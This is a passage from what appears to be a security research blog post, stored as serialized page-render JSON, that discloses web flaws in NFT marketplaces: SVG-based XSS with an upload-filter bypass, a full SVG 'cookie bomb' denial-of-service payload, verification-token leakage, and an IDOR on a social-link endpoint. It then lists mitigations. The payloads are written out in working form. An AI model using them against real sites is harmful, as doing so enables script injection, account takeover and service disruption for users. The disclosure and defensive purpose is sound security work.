xmlns",{"type":25,"tag":216,"props":38243,"children":38244},{"style":6953},[38245],{"type":31,"value":266},{"type":25,"tag":216,"props":38247,"children":38248},{"style":8205},[38249],{"type":31,"value":38250},"\"http://www.w3.org/2000/svg\"",{"type":25,"tag":216,"props":38252,"children":38253},{"style":36338},[38254],{"type":31,"value":9943},{"type":25,"tag":216,"props":38256,"children":38257},{"class":6922,"line":7110},[38258,38262,38267,38271,38275,38279,38283],{"type":25,"tag":216,"props":38259,"children":38260},{"style":36338},[38261],{"type":31,"value":36357},{"type":25,"tag":216,"props":38263,"children":38264},{"style":6936},[38265],{"type":31,"value":38266},"title",{"type":25,"tag":216,"props":38268,"children":38269},{"style":36338},[38270],{"type":31,"value":5902},{"type":25,"tag":216,"props":38272,"children":38273},{"style":6964},[38274],{"type":31,"value":35199},{"type":25,"tag":216,"props":38276,"children":38277},{"style":36338},[38278],{"type":31,"value":36392},{"type":25,"tag":216,"props":38280,"children":38281},{"style":6936},[38282],{"type":31,"value":38266},{"type":25,"tag":216,"props":38284,"children":38285},{"style":36338},[38286],{"type":31,"value":9943},{"type":25,"tag":216,"props":38288,"children":38289},{"class":6922,"line":7216},[38290,38294,38298,38302,38306,38311],{"type":25,"tag":216,"props":38291,"children":38292},{"style":36338},[38293],{"type":31,"value":36357},{"type":25,"tag":216,"props":38295,"children":38296},{"style":6936},[38297],{"type":31,"value":36378},{"type":25,"tag":216,"props":38299,"children":38300},{"style":6947},[38301],{"type":31,"value":36503},{"type":25,"tag":216,"props":38303,"children":38304},{"style":6953},[38305],{"type":31,"value":266},{"type":25,"tag":216,"props":38307,"children":38308},{"style":8205},[38309],{"type":31,"value":38310},"\"text/javascript\"",{"type":25,"tag":216,"props":38312,"children":38313},{"style":36338},[38314],{"type":31,"value":9943},{"type":25,"tag":216,"props":38316,"children":38317},{"class":6922,"line":7244},[38318],{"type":25,"tag":216,"props":38319,"children":38320},{"style":6964},[38321],{"type":31,"value":38322},"   alert(document.domain);\n",{"type":25,"tag":216,"props":38324,"children":38325},{"class":6922,"line":7257},[38326,38331,38335],{"type":25,"tag":216,"props":38327,"children":38328},{"style":36338},[38329],{"type":31,"value":38330},"   \u003C/",{"type":25,"tag":216,"props":38332,"children":38333},{"style":6936},[38334],{"type":31,"value":36378},{"type":25,"tag":216,"props":38336,"children":38337},{"style":36338},[38338],{"type":31,"value":9943},{"type":25,"tag":216,"props":38340,"children":38341},{"class":6922,"line":7275},[38342,38347,38351],{"type":25,"tag":216,"props":38343,"children":38344},{"style":36338},[38345],{"type":31,"value":38346}," \u003C/",{"type":25,"tag":216,"props":38348,"children":38349},{"style":6936},[38350],{"type":31,"value":38236},{"type":25,"tag":216,"props":38352,"children":38353},{"style":36338},[38354],{"type":31,"value":9943},{"type":25,"tag":38,"props":38356,"children":38357},{},[38358,38360,38367],{"type":31,"value":38359},"Although some marketplaces restrict the upload of SVG files, we discovered a way to bypass these checks. One particular instance involved the ",{"type":25,"tag":162,"props":38361,"children":38364},{"href":38362,"rel":38363},"https://xtingles.com/",[166],[38365],{"type":31,"value":38366},"xtingles Marketplace",{"type":31,"value":179},{"type":25,"tag":38,"props":38369,"children":38370},{},[38371],{"type":31,"value":38372},"Even though the file extension was validated based on its name, the content type was not checked. By renaming a file with an allowed extension and inserting an SVG file with the content type \"svg+xml,\", we were able to successfully upload the SVG file.",{"type":25,"tag":38,"props":38374,"children":38375},{},[38376],{"type":31,"value":38377},"Below, we show you how we did it.",{"type":25,"tag":38,"props":38379,"children":38380},{},[38381],{"type":31,"value":38382},"Request when the original SVG was sent, showing it is not accepted as format:",{"type":25,"tag":38,"props":38384,"children":38385},{},[38386],{"type":25,"tag":6467,"props":38387,"children":38389},{"alt":7,"src":38388},"/posts/web2-bug-repellant-instructions/svg-1.png",[],{"type":25,"tag":38,"props":38391,"children":38392},{},[38393],{"type":31,"value":38394},"After changing the extension inside the file name.",{"type":25,"tag":38,"props":38396,"children":38397},{},[38398],{"type":25,"tag":6467,"props":38399,"children":38401},{"alt":7,"src":38400},"/posts/web2-bug-repellant-instructions/svg-2.png",[],{"type":25,"tag":606,"props":38403,"children":38405},{"id":38404},"svgs-return",[38406],{"type":31,"value":38407},"SVGs Return",{"type":25,"tag":38,"props":38409,"children":38410},{},[38411],{"type":31,"value":38412},"We'll give credit where it's due. Some marketplaces mitigate the impact of XSS by storing images in IPFS, Amazon S3 buckets, or CloudFront.",{"type":25,"tag":38,"props":38414,"children":38415},{},[38416],{"type":31,"value":38417},"Unfortunately, this mitigation is still susceptible to a \"cookie bomb\" attack.",{"type":25,"tag":38,"props":38419,"children":38420},{},[38421],{"type":31,"value":38422},"This type of attack overwhelms a web server with an excessive number of cookies and can be used to achieve a Denial of Service (DoS), preventing users from accessing the file on the third-party service.",{"type":25,"tag":206,"props":38424,"children":38428},{"className":38425,"code":38426,"language":38427,"meta":7,"style":7},"language-jsx shiki shiki-themes slack-dark","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n  \u003Ctitle>XSS\u003C/title>\n  \u003Cscript type=\"text/javascript\">\n   var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n   var Set_Cookie = Array(10000).join('a');\n\n   for (var i = 1; i \u003C 99; i++) {\n    document.cookie = 'Cookie' + i + '=' + Set_Cookie + ';Domain=' + Take_Domain;\n   }\n   \u003C/script>\n \u003C/svg>\n","jsx",[38429],{"type":25,"tag":82,"props":38430,"children":38431},{"__ignoreMap":7},[38432,38471,38502,38509,38536,38567,38594,38602,38610,38617,38629,38704,38712,38727],{"type":25,"tag":216,"props":38433,"children":38434},{"class":6922,"line":6923},[38435,38439,38443,38447,38451,38455,38459,38463,38467],{"type":25,"tag":216,"props":38436,"children":38437},{"style":6953},[38438],{"type":31,"value":38142},{"type":25,"tag":216,"props":38440,"children":38441},{"style":6947},[38442],{"type":31,"value":38147},{"type":25,"tag":216,"props":38444,"children":38445},{"style":6947},[38446],{"type":31,"value":38152},{"type":25,"tag":216,"props":38448,"children":38449},{"style":6953},[38450],{"type":31,"value":266},{"type":25,"tag":216,"props":38452,"children":38453},{"style":8205},[38454],{"type":31,"value":38161},{"type":25,"tag":216,"props":38456,"children":38457},{"style":6947},[38458],{"type":31,"value":38166},{"type":25,"tag":216,"props":38460,"children":38461},{"style":6953},[38462],{"type":31,"value":266},{"type":25,"tag":216,"props":38464,"children":38465},{"style":8205},[38466],{"type":31,"value":38175},{"type":25,"tag":216,"props":38468,"children":38469},{"style":6953},[38470],{"type":31,"value":38180},{"type":25,"tag":216,"props":38472,"children":38473},{"class":6922,"line":6769},[38474,38478,38482,38486,38490,38494,38498],{"type":25,"tag":216,"props":38475,"children":38476},{"style":6953},[38477],{"type":31,"value":38188},{"type":25,"tag":216,"props":38479,"children":38480},{"style":6947},[38481],{"type":31,"value":38193},{"type":25,"tag":216,"props":38483,"children":38484},{"style":6947},[38485],{"type":31,"value":38198},{"type":25,"tag":216,"props":38487,"children":38488},{"style":6947},[38489],{"type":31,"value":38203},{"type":25,"tag":216,"props":38491,"children":38492},{"style":8205},[38493],{"type":31,"value":38208},{"type":25,"tag":216,"props":38495,"children":38496},{"style":8205},[38497],{"type":31,"value":38213},{"type":25,"tag":216,"props":38499,"children":38500},{"style":6953},[38501],{"type":31,"value":9943},{"type":25,"tag":216,"props":38503,"children":38504},{"class":6922,"line":6778},[38505],{"type":25,"tag":216,"props":38506,"children":38507},{"emptyLinePlaceholder":16},[38508],{"type":31,"value":7642},{"type":25,"tag":216,"props":38510,"children":38511},{"class":6922,"line":7005},[38512,38516,38520,38524,38528,38532],{"type":25,"tag":216,"props":38513,"children":38514},{"style":36338},[38515],{"type":31,"value":12672},{"type":25,"tag":216,"props":38517,"children":38518},{"style":6936},[38519],{"type":31,"value":38236},{"type":25,"tag":216,"props":38521,"children":38522},{"style":6947},[38523],{"type":31,"value":38241},{"type":25,"tag":216,"props":38525,"children":38526},{"style":6953},[38527],{"type":31,"value":266},{"type":25,"tag":216,"props":38529,"children":38530},{"style":8205},[38531],{"type":31,"value":38250},{"type":25,"tag":216,"props":38533,"children":38534},{"style":36338},[38535],{"type":31,"value":9943},{"type":25,"tag":216,"props":38537,"children":38538},{"class":6922,"line":7110},[38539,38543,38547,38551,38555,38559,38563],{"type":25,"tag":216,"props":38540,"children":38541},{"style":36338},[38542],{"type":31,"value":36357},{"type":25,"tag":216,"props":38544,"children":38545},{"style":6936},[38546],{"type":31,"value":38266},{"type":25,"tag":216,"props":38548,"children":38549},{"style":36338},[38550],{"type":31,"value":5902},{"type":25,"tag":216,"props":38552,"children":38553},{"style":6964},[38554],{"type":31,"value":35199},{"type":25,"tag":216,"props":38556,"children":38557},{"style":36338},[38558],{"type":31,"value":36392},{"type":25,"tag":216,"props":38560,"children":38561},{"style":6936},[38562],{"type":31,"value":38266},{"type":25,"tag":216,"props":38564,"children":38565},{"style":36338},[38566],{"type":31,"value":9943},{"type":25,"tag":216,"props":38568,"children":38569},{"class":6922,"line":7216},[38570,38574,38578,38582,38586,38590],{"type":25,"tag":216,"props":38571,"children":38572},{"style":36338},[38573],{"type":31,"value":36357},{"type":25,"tag":216,"props":38575,"children":38576},{"style":6936},[38577],{"type":31,"value":36378},{"type":25,"tag":216,"props":38579,"children":38580},{"style":6947},[38581],{"type":31,"value":36503},{"type":25,"tag":216,"props":38583,"children":38584},{"style":6953},[38585],{"type":31,"value":266},{"type":25,"tag":216,"props":38587,"children":38588},{"style":8205},[38589],{"type":31,"value":38310},{"type":25,"tag":216,"props":38591,"children":38592},{"style":36338},[38593],{"type":31,"value":9943},{"type":25,"tag":216,"props":38595,"children":38596},{"class":6922,"line":7244},[38597],{"type":25,"tag":216,"props":38598,"children":38599},{"style":6964},[38600],{"type":31,"value":38601},"   var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n",{"type":25,"tag":216,"props":38603,"children":38604},{"class":6922,"line":7257},[38605],{"type":25,"tag":216,"props":38606,"children":38607},{"style":6964},[38608],{"type":31,"value":38609},"   var Set_Cookie = Array(10000).join('a');\n",{"type":25,"tag":216,"props":38611,"children":38612},{"class":6922,"line":7275},[38613],{"type":25,"tag":216,"props":38614,"children":38615},{"emptyLinePlaceholder":16},[38616],{"type":31,"value":7642},{"type":25,"tag":216,"props":38618,"children":38619},{"class":6922,"line":7296},[38620,38625],{"type":25,"tag":216,"props":38621,"children":38622},{"style":6964},[38623],{"type":31,"value":38624},"   for (var i = 1; i \u003C 99; i++) ",{"type":25,"tag":216,"props":38626,"children":38627},{"style":6936},[38628],{"type":31,"value":14836},{"type":25,"tag":216,"props":38630,"children":38631},{"class":6922,"line":7305},[38632,38637,38641,38646,38650,38655,38660,38664,38668,38673,38677,38682,38686,38691,38695,38700],{"type":25,"tag":216,"props":38633,"children":38634},{"style":6947},[38635],{"type":31,"value":38636},"    document",{"type":25,"tag":216,"props":38638,"children":38639},{"style":6953},[38640],{"type":31,"value":179},{"type":25,"tag":216,"props":38642,"children":38643},{"style":6947},[38644],{"type":31,"value":38645},"cookie",{"type":25,"tag":216,"props":38647,"children":38648},{"style":6953},[38649],{"type":31,"value":4983},{"type":25,"tag":216,"props":38651,"children":38652},{"style":8205},[38653],{"type":31,"value":38654},"'Cookie'",{"type":25,"tag":216,"props":38656,"children":38657},{"style":6953},[38658],{"type":31,"value":38659}," + ",{"type":25,"tag":216,"props":38661,"children":38662},{"style":6947},[38663],{"type":31,"value":2289},{"type":25,"tag":216,"props":38665,"children":38666},{"style":6953},[38667],{"type":31,"value":38659},{"type":25,"tag":216,"props":38669,"children":38670},{"style":8205},[38671],{"type":31,"value":38672},"'='",{"type":25,"tag":216,"props":38674,"children":38675},{"style":6953},[38676],{"type":31,"value":38659},{"type":25,"tag":216,"props":38678,"children":38679},{"style":6947},[38680],{"type":31,"value":38681},"Set_Cookie",{"type":25,"tag":216,"props":38683,"children":38684},{"style":6953},[38685],{"type":31,"value":38659},{"type":25,"tag":216,"props":38687,"children":38688},{"style":8205},[38689],{"type":31,"value":38690},"';Domain='",{"type":25,"tag":216,"props":38692,"children":38693},{"style":6953},[38694],{"type":31,"value":38659},{"type":25,"tag":216,"props":38696,"children":38697},{"style":6947},[38698],{"type":31,"value":38699},"Take_Domain",{"type":25,"tag":216,"props":38701,"children":38702},{"style":6953},[38703],{"type":31,"value":6967},{"type":25,"tag":216,"props":38705,"children":38706},{"class":6922,"line":7557},[38707],{"type":25,"tag":216,"props":38708,"children":38709},{"style":6936},[38710],{"type":31,"value":38711},"   }\n",{"type":25,"tag":216,"props":38713,"children":38714},{"class":6922,"line":7574},[38715,38719,38723],{"type":25,"tag":216,"props":38716,"children":38717},{"style":36338},[38718],{"type":31,"value":38330},{"type":25,"tag":216,"props":38720,"children":38721},{"style":6936},[38722],{"type":31,"value":36378},{"type":25,"tag":216,"props":38724,"children":38725},{"style":36338},[38726],{"type":31,"value":9943},{"type":25,"tag":216,"props":38728,"children":38729},{"class":6922,"line":7591},[38730,38734,38738],{"type":25,"tag":216,"props":38731,"children":38732},{"style":36338},[38733],{"type":31,"value":38346},{"type":25,"tag":216,"props":38735,"children":38736},{"style":6936},[38737],{"type":31,"value":38236},{"type":25,"tag":216,"props":38739,"children":38740},{"style":36338},[38741],{"type":31,"value":9943},{"type":25,"tag":38,"props":38743,"children":38744},{},[38745],{"type":31,"value":38746},"As a result, we're able to prevent the user from loading images.",{"type":25,"tag":26,"props":38748,"children":38750},{"id":38749},"authentication",[38751],{"type":31,"value":38752},"Authentication",{"type":25,"tag":38,"props":38754,"children":38755},{},[38756],{"type":25,"tag":64,"props":38757,"children":38758},{},[38759,38761,38768],{"type":31,"value":38760},"The door could not be heard slamming; they had probably left it open, as is the custom in homes where a ",{"type":25,"tag":162,"props":38762,"children":38765},{"href":38763,"rel":38764},"https://auth0.com/docs/get-started/identity-fundamentals/authentication-and-authorization",[166],[38766],{"type":31,"value":38767},"great misfortune has occured",{"type":31,"value":179},{"type":25,"tag":606,"props":38770,"children":38772},{"id":38771},"verification-token-leakage",[38773],{"type":31,"value":38774},"Verification Token Leakage",{"type":25,"tag":38,"props":38776,"children":38777},{},[38778],{"type":31,"value":38779},"When a user signs up for a service or creates an account that requires email verification, the system generates a unique token and sends it to the provided email address.",{"type":25,"tag":38,"props":38781,"children":38782},{},[38783],{"type":31,"value":38784},"This token is usually a random combination of letters, numbers, and symbols that are designed to be difficult to guess. The user is then instructed to verify their email by clicking a link that was sent to their inbox. However, if the email verification flow is not implemented correctly, it can result in security vulnerabilities.",{"type":25,"tag":38,"props":38786,"children":38787},{},[38788,38793],{"type":25,"tag":64,"props":38789,"children":38790},{},[38791],{"type":31,"value":38792},"Proof of Concept",{"type":31,"value":38794},"\nWhile reviewing the Tensor website source code, we found a feature that allowed us to send verification emails to any email with a spoofed verification link. This could potentially result in the leakage of email verification codes, enabling an attacker to associate a victim’s email with their own account.",{"type":25,"tag":38,"props":38796,"children":38797},{},[38798],{"type":31,"value":38799},"Here's the breakdown.",{"type":25,"tag":38,"props":38801,"children":38802},{},[38803],{"type":31,"value":38804},"First, we send the verification link to a user's email:",{"type":25,"tag":35308,"props":38806,"children":38807},{"style":35310},[38808],{"type":25,"tag":6467,"props":38809,"children":38813},{"src":38810,"alt":38811,"style":38812},"/posts/web2-bug-repellant-instructions/token-leakage.png","token-leakage","max-height:650px;",[],{"type":25,"tag":38,"props":38815,"children":38816},{},[38817],{"type":31,"value":38818},"If the user clicks on the spoofed URL, their token will be stolen, allowing the attacker to link their account to the victim’s email.",{"type":25,"tag":606,"props":38820,"children":38822},{"id":38821},"idor",[38823],{"type":31,"value":38824},"IDOR",{"type":25,"tag":38,"props":38826,"children":38827},{},[38828],{"type":25,"tag":64,"props":38829,"children":38830},{},[38831,38833,38840],{"type":31,"value":38832},"As Gregor Samsa awoke one morning from uneasy dreams he found himself transformed in his bed into a gigantic ",{"type":25,"tag":162,"props":38834,"children":38837},{"href":38835,"rel":38836},"https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html",[166],[38838],{"type":31,"value":38839},"insect",{"type":31,"value":179},{"type":25,"tag":38,"props":38842,"children":38843},{},[38844,38846,38852],{"type":31,"value":38845},"During a security assessment of the ",{"type":25,"tag":162,"props":38847,"children":38850},{"href":38848,"rel":38849},"https://rocki.com",[166],[38851],{"type":31,"value":35246},{"type":31,"value":38853},", a critical vulnerability known as an Insecure Direct Object Reference (IDOR) was identified within the social link modification functionality. Exploiting this vulnerability enables an attacker to modify the social media links of other users without proper authorization.",{"type":25,"tag":38,"props":38855,"children":38856},{},[38857],{"type":31,"value":38858},"The specific vulnerable endpoint was identified as a POST request to /api/user/modifySocialLink, which is responsible for handling requests to update social media links associated with user accounts. This endpoint requires two parameters: \"newLink\" to specify the desired social media link and \"id\" to indicate the user's ID.",{"type":25,"tag":38,"props":38860,"children":38861},{},[38862],{"type":31,"value":38863},"Now, to exploit this vulnerability, an attacker can intercept or modify the request being sent to the \"POST /api/user/modifySocialLink\" endpoint. By manipulating the \"id\" parameter with the user ID of another user, the attacker is able to bypass proper authorization checks and modify the social media link associated with the targeted user's account.",{"type":25,"tag":38,"props":38865,"children":38866},{},[38867,38869,38875,38877,38882],{"type":31,"value":38868},"Here is an example of a request that modifies another user's social media link to ",{"type":25,"tag":82,"props":38870,"children":38872},{"className":38871},[],[38873],{"type":31,"value":38874},"https://evil.com/",{"type":31,"value":38876},". To achieve this, we simply changed the ",{"type":25,"tag":82,"props":38878,"children":38880},{"className":38879},[],[38881],{"type":31,"value":7443},{"type":31,"value":38883}," field value to one that belongs to another user:",{"type":25,"tag":38,"props":38885,"children":38886},{},[38887],{"type":25,"tag":6467,"props":38888,"children":38890},{"alt":7,"src":38889},"/posts/web2-bug-repellant-instructions/idor-1.png",[],{"type":25,"tag":38,"props":38892,"children":38893},{},[38894],{"type":31,"value":38895},"The following screenshot is the response to our request:",{"type":25,"tag":38,"props":38897,"children":38898},{},[38899],{"type":25,"tag":6467,"props":38900,"children":38902},{"alt":7,"src":38901},"/posts/web2-bug-repellant-instructions/idor-2.png",[],{"type":25,"tag":26,"props":38904,"children":38906},{"id":38905},"preventative-action-steps-for-marketplaces",[38907],{"type":25,"tag":9273,"props":38908,"children":38909},{},[38910],{"type":31,"value":38911},"Preventative Action Steps for Marketplaces",{"type":25,"tag":38,"props":38913,"children":38914},{},[38915],{"type":31,"value":38916},"To mitigate the vulnerabilities we’ve discussed, NFT marketplaces must prioritize the implementation of robust security measures. Below, we outline potential mitigations that can help platforms enhance their security posture and protect users and their valuable digital assets.",{"type":25,"tag":38,"props":38918,"children":38919},{},[38920,38922,38928,38930,38936],{"type":31,"value":38921},"First and foremost, NFT marketplaces should prioritize security by strengthening their input validation and output encoding processes. This can be done by encoding untrusted data with HTML entities in backend or using ",{"type":25,"tag":82,"props":38923,"children":38925},{"className":38924},[],[38926],{"type":31,"value":38927},"innerText",{"type":31,"value":38929}," instead of ",{"type":25,"tag":82,"props":38931,"children":38933},{"className":38932},[],[38934],{"type":31,"value":38935},"innerHTML",{"type":31,"value":38937}," in client-side:",{"type":25,"tag":206,"props":38939,"children":38941},{"className":35325,"code":38940,"language":35327,"meta":7,"style":7},"document.getElementById('nftCollectionName').innerText = nftCollectionName;\n",[38942],{"type":25,"tag":82,"props":38943,"children":38944},{"__ignoreMap":7},[38945],{"type":25,"tag":216,"props":38946,"children":38947},{"class":6922,"line":6923},[38948,38952,38956,38961,38965,38970,38974,38978,38982,38987],{"type":25,"tag":216,"props":38949,"children":38950},{"style":6947},[38951],{"type":31,"value":36670},{"type":25,"tag":216,"props":38953,"children":38954},{"style":6964},[38955],{"type":31,"value":179},{"type":25,"tag":216,"props":38957,"children":38958},{"style":7047},[38959],{"type":31,"value":38960},"getElementById",{"type":25,"tag":216,"props":38962,"children":38963},{"style":6964},[38964],{"type":31,"value":1850},{"type":25,"tag":216,"props":38966,"children":38967},{"style":8205},[38968],{"type":31,"value":38969},"'nftCollectionName'",{"type":25,"tag":216,"props":38971,"children":38972},{"style":6964},[38973],{"type":31,"value":24702},{"type":25,"tag":216,"props":38975,"children":38976},{"style":6947},[38977],{"type":31,"value":38927},{"type":25,"tag":216,"props":38979,"children":38980},{"style":6953},[38981],{"type":31,"value":6956},{"type":25,"tag":216,"props":38983,"children":38984},{"style":6947},[38985],{"type":31,"value":38986}," nftCollectionName",{"type":25,"tag":216,"props":38988,"children":38989},{"style":6964},[38990],{"type":31,"value":6967},{"type":25,"tag":38,"props":38992,"children":38993},{},[38994],{"type":31,"value":38995},"However, rendering HTML or markdown user input is intended. In these cases, dangerous HTML tags need to be validated and sanitized via consolidated libraries like DomPurify:",{"type":25,"tag":206,"props":38997,"children":38999},{"className":35325,"code":38998,"language":35327,"meta":7,"style":7},"var sanitizedInput = DOMPurify.sanitize(userInput);\n",[39000],{"type":25,"tag":82,"props":39001,"children":39002},{"__ignoreMap":7},[39003],{"type":25,"tag":216,"props":39004,"children":39005},{"class":6922,"line":6923},[39006,39011,39016,39020,39025,39029,39034,39038,39043],{"type":25,"tag":216,"props":39007,"children":39008},{"style":6936},[39009],{"type":31,"value":39010},"var",{"type":25,"tag":216,"props":39012,"children":39013},{"style":6947},[39014],{"type":31,"value":39015}," sanitizedInput",{"type":25,"tag":216,"props":39017,"children":39018},{"style":6953},[39019],{"type":31,"value":6956},{"type":25,"tag":216,"props":39021,"children":39022},{"style":6947},[39023],{"type":31,"value":39024}," DOMPurify",{"type":25,"tag":216,"props":39026,"children":39027},{"style":6964},[39028],{"type":31,"value":179},{"type":25,"tag":216,"props":39030,"children":39031},{"style":7047},[39032],{"type":31,"value":39033},"sanitize",{"type":25,"tag":216,"props":39035,"children":39036},{"style":6964},[39037],{"type":31,"value":1850},{"type":25,"tag":216,"props":39039,"children":39040},{"style":6947},[39041],{"type":31,"value":39042},"userInput",{"type":25,"tag":216,"props":39044,"children":39045},{"style":6964},[39046],{"type":31,"value":7797},{"type":25,"tag":38,"props":39048,"children":39049},{},[39050,39052,39059],{"type":31,"value":39051},"This can effectively mitigate the risk of XSS attacks. With that being said, implementing security measures such as ",{"type":25,"tag":162,"props":39053,"children":39056},{"href":39054,"rel":39055},"https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP",[166],[39057],{"type":31,"value":39058},"Content-Security-Policy",{"type":31,"value":39060}," (CSP) will help ensure that generated content is rendered safely, without compromising the platform's security.",{"type":25,"tag":38,"props":39062,"children":39063},{},[39064],{"type":31,"value":39065},"Furthermore, a key step is for NFT marketplaces to establish strict file upload policies. By conducting thorough checks on file types and content, platforms can prevent the upload of potentially malicious SVG files. Validating both the file extension and content type will significantly reduce the risk of SVG-based XSS attacks, ensuring a safer user experience.",{"type":25,"tag":38,"props":39067,"children":39068},{},[39069,39071,39078],{"type":31,"value":39070},"Another precaution is to implement secure redirect mechanisms. By implementing a server-side allow-list of trusted domains, NFT marketplaces can prevent open redirect vulnerabilities. This ensures that users are directed only to trusted and intended domains, safeguarding them from potential phishing or malicious attacks where the authentication code is leaked. Here we are showing an example of a secure redirect by applying an ",{"type":25,"tag":162,"props":39072,"children":39075},{"href":39073,"rel":39074},"https://www.techtarget.com/whatis/definition/whitelist",[166],[39076],{"type":31,"value":39077},"allow-list",{"type":31,"value":39079}," :",{"type":25,"tag":206,"props":39081,"children":39083},{"className":35325,"code":39082,"language":35327,"meta":7,"style":7},"const allowDomains = ['https://allowed-domain'];\nif (!allowDomains.includes(domain)) {\n  throw new ApolloError('invalid domain');\n}\n",[39084],{"type":25,"tag":82,"props":39085,"children":39086},{"__ignoreMap":7},[39087,39116,39158,39188],{"type":25,"tag":216,"props":39088,"children":39089},{"class":6922,"line":6923},[39090,39094,39099,39103,39107,39112],{"type":25,"tag":216,"props":39091,"children":39092},{"style":6936},[39093],{"type":31,"value":13611},{"type":25,"tag":216,"props":39095,"children":39096},{"style":6947},[39097],{"type":31,"value":39098}," allowDomains",{"type":25,"tag":216,"props":39100,"children":39101},{"style":6953},[39102],{"type":31,"value":6956},{"type":25,"tag":216,"props":39104,"children":39105},{"style":6964},[39106],{"type":31,"value":26978},{"type":25,"tag":216,"props":39108,"children":39109},{"style":8205},[39110],{"type":31,"value":39111},"'https://allowed-domain'",{"type":25,"tag":216,"props":39113,"children":39114},{"style":6964},[39115],{"type":31,"value":35536},{"type":25,"tag":216,"props":39117,"children":39118},{"class":6922,"line":6769},[39119,39123,39127,39131,39136,39140,39145,39149,39153],{"type":25,"tag":216,"props":39120,"children":39121},{"style":6973},[39122],{"type":31,"value":19537},{"type":25,"tag":216,"props":39124,"children":39125},{"style":6964},[39126],{"type":31,"value":7016},{"type":25,"tag":216,"props":39128,"children":39129},{"style":6953},[39130],{"type":31,"value":24581},{"type":25,"tag":216,"props":39132,"children":39133},{"style":6947},[39134],{"type":31,"value":39135},"allowDomains",{"type":25,"tag":216,"props":39137,"children":39138},{"style":6964},[39139],{"type":31,"value":179},{"type":25,"tag":216,"props":39141,"children":39142},{"style":7047},[39143],{"type":31,"value":39144},"includes",{"type":25,"tag":216,"props":39146,"children":39147},{"style":6964},[39148],{"type":31,"value":1850},{"type":25,"tag":216,"props":39150,"children":39151},{"style":6947},[39152],{"type":31,"value":36680},{"type":25,"tag":216,"props":39154,"children":39155},{"style":6964},[39156],{"type":31,"value":39157},")) {\n",{"type":25,"tag":216,"props":39159,"children":39160},{"class":6922,"line":6778},[39161,39166,39170,39175,39179,39184],{"type":25,"tag":216,"props":39162,"children":39163},{"style":6973},[39164],{"type":31,"value":39165},"  throw",{"type":25,"tag":216,"props":39167,"children":39168},{"style":6936},[39169],{"type":31,"value":35895},{"type":25,"tag":216,"props":39171,"children":39172},{"style":7047},[39173],{"type":31,"value":39174}," ApolloError",{"type":25,"tag":216,"props":39176,"children":39177},{"style":6964},[39178],{"type":31,"value":1850},{"type":25,"tag":216,"props":39180,"children":39181},{"style":8205},[39182],{"type":31,"value":39183},"'invalid domain'",{"type":25,"tag":216,"props":39185,"children":39186},{"style":6964},[39187],{"type":31,"value":7797},{"type":25,"tag":216,"props":39189,"children":39190},{"class":6922,"line":7005},[39191],{"type":25,"tag":216,"props":39192,"children":39193},{"style":6964},[39194],{"type":31,"value":7874},{"type":25,"tag":38,"props":39196,"children":39197},{},[39198,39200,39207,39209,39216],{"type":31,"value":39199},"As ",{"type":25,"tag":162,"props":39201,"children":39204},{"href":39202,"rel":39203},"https://graphql.org/",[166],[39205],{"type":31,"value":39206},"GraphQl",{"type":31,"value":39208}," is widely utilized by NFT marketplaces, it is crucial to understand the reasons behind disabling certain features like ",{"type":25,"tag":162,"props":39210,"children":39213},{"href":39211,"rel":39212},"https://graphql.org/learn/introspection/",[166],[39214],{"type":31,"value":39215},"introspection",{"type":31,"value":39217}," in production environments. By disabling introspection, it ensures that clients are unable to query the API's schema, preventing the potential exposure of sensitive information regarding its structure and implementation. Below, we provide an example of how to achieve this using the Apollo server:",{"type":25,"tag":206,"props":39219,"children":39221},{"className":35325,"code":39220,"language":35327,"meta":7,"style":7},"const server = new ApolloServer({\n  typeDefs,\n  resolvers,\n  introspection: false,\n});\n",[39222],{"type":25,"tag":82,"props":39223,"children":39224},{"__ignoreMap":7},[39225,39254,39266,39278,39294],{"type":25,"tag":216,"props":39226,"children":39227},{"class":6922,"line":6923},[39228,39232,39237,39241,39245,39250],{"type":25,"tag":216,"props":39229,"children":39230},{"style":6936},[39231],{"type":31,"value":13611},{"type":25,"tag":216,"props":39233,"children":39234},{"style":6947},[39235],{"type":31,"value":39236}," server",{"type":25,"tag":216,"props":39238,"children":39239},{"style":6953},[39240],{"type":31,"value":6956},{"type":25,"tag":216,"props":39242,"children":39243},{"style":6936},[39244],{"type":31,"value":35895},{"type":25,"tag":216,"props":39246,"children":39247},{"style":7047},[39248],{"type":31,"value":39249}," ApolloServer",{"type":25,"tag":216,"props":39251,"children":39252},{"style":6964},[39253],{"type":31,"value":19098},{"type":25,"tag":216,"props":39255,"children":39256},{"class":6922,"line":6769},[39257,39262],{"type":25,"tag":216,"props":39258,"children":39259},{"style":6947},[39260],{"type":31,"value":39261},"  typeDefs",{"type":25,"tag":216,"props":39263,"children":39264},{"style":6964},[39265],{"type":31,"value":7465},{"type":25,"tag":216,"props":39267,"children":39268},{"class":6922,"line":6778},[39269,39274],{"type":25,"tag":216,"props":39270,"children":39271},{"style":6947},[39272],{"type":31,"value":39273},"  resolvers",{"type":25,"tag":216,"props":39275,"children":39276},{"style":6964},[39277],{"type":31,"value":7465},{"type":25,"tag":216,"props":39279,"children":39280},{"class":6922,"line":7005},[39281,39286,39290],{"type":25,"tag":216,"props":39282,"children":39283},{"style":6947},[39284],{"type":31,"value":39285},"  introspection:",{"type":25,"tag":216,"props":39287,"children":39288},{"style":6936},[39289],{"type":31,"value":13012},{"type":25,"tag":216,"props":39291,"children":39292},{"style":6964},[39293],{"type":31,"value":7465},{"type":25,"tag":216,"props":39295,"children":39296},{"class":6922,"line":7110},[39297],{"type":25,"tag":216,"props":39298,"children":39299},{"style":6964},[39300],{"type":31,"value":39301},"});\n",{"type":25,"tag":38,"props":39303,"children":39304},{},[39305,39307,39314,39316,39323],{"type":31,"value":39306},"Similarly, when ",{"type":25,"tag":162,"props":39308,"children":39311},{"href":39309,"rel":39310},"https://www.apollographql.com/blog/apollo-client/performance/batching-client-graphql-queries/",[166],[39312],{"type":31,"value":39313},"batching",{"type":31,"value":39315}," is enabled, the code should limit the number of queries that can run simultaneously and implement object request rate limiting. This additional measure helps protect the website from potential 